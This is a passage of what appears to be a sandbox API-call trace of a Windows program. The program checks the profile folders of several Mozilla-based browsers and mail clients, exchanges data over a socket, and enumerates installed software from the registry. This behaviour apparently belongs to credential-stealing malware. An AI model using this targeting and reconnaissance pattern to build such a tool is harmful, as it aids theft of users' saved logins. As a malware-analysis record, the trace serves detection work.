lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Waterfox\\*", lpFindFileData=0x38edc4 | out: lpFindFileData=0x38edc4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.447] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed84) returned 1 [0234.448] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef7c, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0234.448] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Roaming\\K-Meleon", lpDst=0x38ef7c, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\K-Meleon") returned 0x2c [0234.448] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38f014) returned 1 [0234.448] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\K-Meleon", nBufferLength=0x105, lpBuffer=0x38eaf4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\K-Meleon", lpFilePart=0x0) returned 0x2b [0234.449] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\K-Meleon\\*", lpFindFileData=0x38edc4 | out: lpFindFileData=0x38edc4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.449] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed84) returned 1 [0234.450] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef7c, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0234.450] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Roaming\\Thunderbird", lpDst=0x38ef7c, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Thunderbird") returned 0x2f [0234.450] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38f014) returned 1 [0234.450] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Thunderbird", nBufferLength=0x105, lpBuffer=0x38eaf4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Thunderbird", lpFilePart=0x0) returned 0x2e [0234.450] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Thunderbird\\*", lpFindFileData=0x38edc4 | out: lpFindFileData=0x38edc4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.450] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed84) returned 1 [0234.452] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef7c, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0234.452] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Roaming\\Comodo\\IceDragon", lpDst=0x38ef7c, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Comodo\\IceDragon") returned 0x34 [0234.452] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38f014) returned 1 [0234.452] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Comodo\\IceDragon", nBufferLength=0x105, lpBuffer=0x38eaf4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Comodo\\IceDragon", lpFilePart=0x0) returned 0x33 [0234.452] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Comodo\\IceDragon\\*", lpFindFileData=0x38edc4 | out: lpFindFileData=0x38edc4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.452] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed84) returned 1 [0234.454] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef7c, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0234.454] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Roaming\\8pecxstudios\\Cyberfox", lpDst=0x38ef7c, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\8pecxstudios\\Cyberfox") returned 0x39 [0234.454] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38f014) returned 1 [0234.454] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\8pecxstudios\\Cyberfox", nBufferLength=0x105, lpBuffer=0x38eaf4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\8pecxstudios\\Cyberfox", lpFilePart=0x0) returned 0x38 [0234.454] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\8pecxstudios\\Cyberfox\\*", lpFindFileData=0x38edc4 | out: lpFindFileData=0x38edc4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.454] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed84) returned 1 [0234.456] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef7c, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0234.456] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Roaming\\NETGATE Technologies\\BlackHaw", lpDst=0x38ef7c, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\NETGATE Technologies\\BlackHaw") returned 0x41 [0234.456] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38f014) returned 1 [0234.456] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\NETGATE Technologies\\BlackHaw", nBufferLength=0x105, lpBuffer=0x38eaf4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\NETGATE Technologies\\BlackHaw", lpFilePart=0x0) returned 0x40 [0234.456] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\NETGATE Technologies\\BlackHaw\\*", lpFindFileData=0x38edc4 | out: lpFindFileData=0x38edc4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.456] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed84) returned 1 [0234.458] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef7c, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0234.458] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Roaming\\Moonchild Productions\\Pale Moon", lpDst=0x38ef7c, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Moonchild Productions\\Pale Moon") returned 0x43 [0234.458] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38f014) returned 1 [0234.458] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Moonchild Productions\\Pale Moon", nBufferLength=0x105, lpBuffer=0x38eaf4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Moonchild Productions\\Pale Moon", lpFilePart=0x0) returned 0x42 [0234.458] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Moonchild Productions\\Pale Moon\\*", lpFindFileData=0x38edc4 | out: lpFindFileData=0x38edc4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.458] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed84) returned 1 [0234.463] CoCreateGuid (in: pguid=0x38edc8 | out: pguid=0x38edc8*(Data1=0x4dceaa6d, Data2=0x7ed2, Data3=0x47ff, Data4=([0]=0xb5, [1]=0xac, [2]=0x84, [3]=0xd1, [4]=0xf, [5]=0x3d, [6]=0x51, [7]=0x4c))) returned 0x0 [0234.463] CoCreateGuid (in: pguid=0x38ed0c | out: pguid=0x38ed0c*(Data1=0x233a16f1, Data2=0xc3c8, Data3=0x426e, Data4=([0]=0x8e, [1]=0x35, [2]=0xd5, [3]=0xd2, [4]=0xc7, [5]=0xcd, [6]=0x83, [7]=0x82))) returned 0x0 [0234.463] send (s=0x268, buf=0x3bf9f9f*, len=171, flags=0) returned 171 [0234.463] recv (in: s=0x268, buf=0x25746cc, len=8192, flags=0 | out: buf=0x25746cc*) returned 132 [0234.512] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall", ulOptions=0x0, samDesired=0x20019, phkResult=0x38f0c4 | out: phkResult=0x38f0c4*=0x610) returned 0x0 [0234.513] RegQueryInfoKeyW (in: hKey=0x610, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x38f0ec, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x38f0e8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x38f0ec*=0x2b, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x38f0e8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0234.513] RegEnumKeyExW (in: hKey=0x610, dwIndex=0x0, lpName=0x2658960, lpcchName=0x38f108, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="AddressBook", lpcchName=0x38f108, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0234.513] CoTaskMemFree (pv=0x0) [0234.513] RegEnumKeyExW (in: hKey=0x610, dwIndex=0x1, lpName=0x2658960, lpcchName=0x38f108, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Connection Manager", lpcchName=0x38f108, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0234.513] CoTaskMemFree (pv=0x0) [0234.513] RegEnumKeyExW (in: hKey=0x610, dwIndex=0x2, lpName=0x2658960, lpcchName=0x38f108, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="DirectDrawEx", lpcchName=0x38f108, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0234.513] CoTaskMemFree (pv=0x0) [0234.513] RegEnumKeyExW (in: hKey=0x610, dwIndex=0x3, lpName=0x2658960, lpcchName=0x38f108, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Fontcore", lpcchName=0x38f108, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0234.513] CoTaskMemFree (pv=0x0) [0234.513] RegEnumKeyExW (in: hKey=0x610, dwIndex=0x4, lpName=0x2658960, lpcchName=0x38f108, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IE40", lpcchName=0x38f108, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0234.513] CoTaskMemFree (pv=0x0) [0234.513] RegEnumKeyExW (in: hKey=0x610, dwIndex=0x5, lpName=0x2658960, lpcchName=0x38f108, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IE4Data", lpcchName=0x38f108, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0234.513] CoTaskMemFree (pv=0x0) [0234.514] RegEnumKeyExW (in: hKey=0x610, dwIndex=0x6, lpName=0x2658960, lpcchName=0x38f108, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IE5BAKEX", lpcchName=0x38f108, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0234.514] CoTaskMemFree (pv=0x0) [0234.514] RegEnumKeyExW (in: hKey=0x610, dwIndex=0x7, lpName=0x2658960, lpcchName=0x38f108, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IEData", lpcchName=0x38f108, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0234.514] CoTaskMemFree (pv=0x0) [0234.514] RegEnumKeyExW (in: hKey=0x610, dwIndex=0x8, lpName=0x2658960, lpcchName=0x38f108, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="MobileOptionPack", lpcchName=0x38f108, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0234.514] CoTaskMemFree (pv=0x0) [0234.514] RegEnumKeyExW (in: hKey=0x610, dwIndex=0x9, lpName=0x2658960, lpcchName=0x38f108, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="SchedulingAgent", lpcchName=0x38f108, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0234.514] CoTaskMemFree (pv=0x0) [0234.514] RegEnumKeyExW (in: hKey=0x610, dwIndex=0xa, lpName=0x2658960, lpcchName=0x38f108, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WIC", lpcchName=0x38f108, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0234.514] CoTaskMemFree (pv=0x0) [0234.514] RegEnumKeyExW (in: hKey=0x610, dwIndex=0xb, lpName=0x2658960, lpcchName=0x38f108, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{0FA68574-690B-4B00-89AA-B28946231449}", lpcchName=0x38f108, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0234.514] CoTaskMemFree (pv=0x0) [0234.514] RegEnumKeyExW (in: hKey=0x610, dwIndex=0xc, lpName=0x2658960, lpcchName=0x38f108, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}", lpcchName=0x38f108, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0234.514] CoTaskMemFree (pv=0x0) [0234.514] RegEnumKeyExW (in: hKey=0x610, dwIndex=0xd, lpName=0x2658960, lpcchName=0x38f108, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757", lpcchName=0x38f108, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0234.514] CoTaskMemFree (pv=0x0) [0234.514] RegEnumKeyExW (in: hKey=0x610, dwIndex=0xe, lpName=0x2658960, lpcchName=0x38f108, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173", lpcchName=0x38f108, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0234.514] CoTaskMemFree (pv=0x0) [0234.514] RegEnumKeyExW (in: hKey=0x610, dwIndex=0xf, lpName=0x2658960, lpcchName=0x38f108, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860", lpcchName=0x38f108, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0234.514] CoTaskMemFree (pv=0x0) [0234.515] RegEnumKeyExW (in: hKey=0x610, dwIndex=0x10, lpName=0x2658960, lpcchName=0x38f108, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655", lpcchName=0x38f108, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0234.515] CoTaskMemFree (pv=0x0) [0234.515] RegEnumKeyExW (in: hKey=0x610, dwIndex=0x11, lpName=0x2658960, lpcchName=0x38f108, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743", lpcchName=0x38f108, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0234.515] CoTaskMemFree (pv=0x0) [0234.515] RegEnumKeyExW (in: hKey=0x610, dwIndex=0x12, lpName=0x2658960, lpcchName=0x38f108, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063", lpcchName=0x38f108, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0234.515] RegEnumKeyExW (in: hKey=0x610, dwIndex=0x13, lpName=0x2658960, lpcchName=0x38f108, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573", lpcchName=0x38f108, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0234.515] RegEnumKeyExW (in: hKey=0x610, dwIndex=0x14, lpName=0x2658960, lpcchName=0x38f108, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}", lpcchName=0x38f108, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0234.515] RegEnumKeyExW (in: hKey=0x610, dwIndex=0x15, lpName=0x2658960, lpcchName=0x38f108, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", lpcchName=0x38f108, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0234.515] RegEnumKeyExW (in: hKey=0x610, dwIndex=0x16, lpName=0x2658960, lpcchName=0x38f108, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{3c3aafc8-d898-43ec-998f-965ffdae065a}", lpcchName=0x38f108, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0234.515] RegEnumKeyExW (in: hKey=0x610, dwIndex=0x17, lpName=0x2658960, lpcchName=0x38f108, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{65e650ff-30be-469d-b63a-418d71ea1765}", lpcchName=0x38f108, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0234.515] RegEnumKeyExW (in: hKey=0x610, dwIndex=0x18, lpName=0x2658960, lpcchName=0x38f108, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{6913e92a-b64e-41c9-a5e6-cef39207fe89}", lpcchName=0x38f108, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0234.515] RegEnumKeyExW (in: hKey=0x610, dwIndex=0x19, lpName=0x2658960, lpcchName=0x38f108, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}", lpcchName=0x38f108, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0234.516] RegEnumKeyExW (in: hKey=0x610, dwIndex=0x1a, lpName=0x2658960, lpcchName=0x38f108, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90160000-008C-0000-0000-0000000FF1CE}", lpcchName=0x38f108, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0234.516] RegEnumKeyExW (in: hKey=0x610, dwIndex=0x1b, lpName=0x2658960, lpcchName=0x38f108, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90160000-008C-0409-0000-0000000FF1CE}", lpcchName=0x38f108, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0234.516] RegEnumKeyExW (in: hKey=0x610, dwIndex=0x1c, lpName=0x2658960, lpcchName=0x38f108, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4503575", lpcchName=0x38f108, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0234.516] RegEnumKeyExW (in: hKey=0x610, dwIndex=0x1d, lpName=0x2658960, lpcchName=0x38f108, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{9BE518E6-ECC6-35A9-88E4-87755C07200F}", lpcchName=0x38f108, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0234.516] RegEnumKeyExW (in: hKey=0x610, dwIndex=0x1e, lpName=0x2658960, lpcchName=0x38f108, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{B175520C-86A2-35A7-8619-86DC379688B9}", lpcchName=0x38f108, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0234.516] RegEnumKeyExW (in: hKey=0x610, dwIndex=0x1f, lpName=0x2658960, lpcchName=0x38f108, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}", lpcchName=0x38f108, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0234.516] RegEnumKeyExW (in: hKey=0x610, dwIndex=0x20, lpName=0x2658960, lpcchName=0x38f108, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", lpcchName=0x38f108, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0234.516] RegEnumKeyExW (in: hKey=0x610, dwIndex=0x21, lpName=0x2658960, lpcchName=0x38f108, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{e6e75766-da0f-4ba2-9788-6ea593ce702d}", lpcchName=0x38f108, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0234.516] RegEnumKeyExW (in: hKey=0x610, dwIndex=0x22, lpName=0x2658960, lpcchName=0x38f108, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}", lpcchName=0x38f108, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0234.516] RegEnumKeyExW (in: hKey=0x610, dwIndex=0x23, lpName=0x2658960, lpcchName=0x38f108, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2151757", lpcchName=0x38f108, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0234.516] RegEnumKeyExW (in: hKey=0x610, dwIndex=0x24, lpName=0x2658960, lpcchName=0x38f108, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2467173", lpcchName=0x38f108, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0234.516] RegEnumKeyExW (in: hKey=0x610, dwIndex=0x25, lpName=0x2658960, lpcchName=0x38f108, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2524860", lpcchName=0x38f108, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0234.516] RegEnumKeyExW (in: hKey=0x610, dwIndex=0x26, lpName=0x2658960, lpcchName=0x38f108, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2544655", lpcchName=0x38f108, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0234.516] RegEnumKeyExW (in: hKey=0x610, dwIndex=0x27, lpName=0x2658960, lpcchName=0x38f108, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2549743", lpcchName=0x38f108, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0234.517] RegEnumKeyExW (in: hKey=0x610, dwIndex=0x28, lpName=0x2658960, lpcchName=0x38f108, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2565063", lpcchName=0x38f108, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0234.517] RegEnumKeyExW (in: hKey=0x610, dwIndex=0x29, lpName=0x2658960, lpcchName=0x38f108, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB982573", lpcchName=0x38f108, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0234.517] RegEnumKeyExW (in: hKey=0x610, dwIndex=0x2a, lpName=0x2658960, lpcchName=0x38f108, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}", lpcchName=0x38f108, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0234.517] RegOpenKeyExW (in: hKey=0x610, lpSubKey="AddressBook", ulOptions=0x0, samDesired=0x20019, phkResult=0x38f0c4 | out: phkResult=0x38f0c4*=0x608) returned 0x0 [0234.517] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayName", lpReserved=0x0, lpType=0x38f0e4, 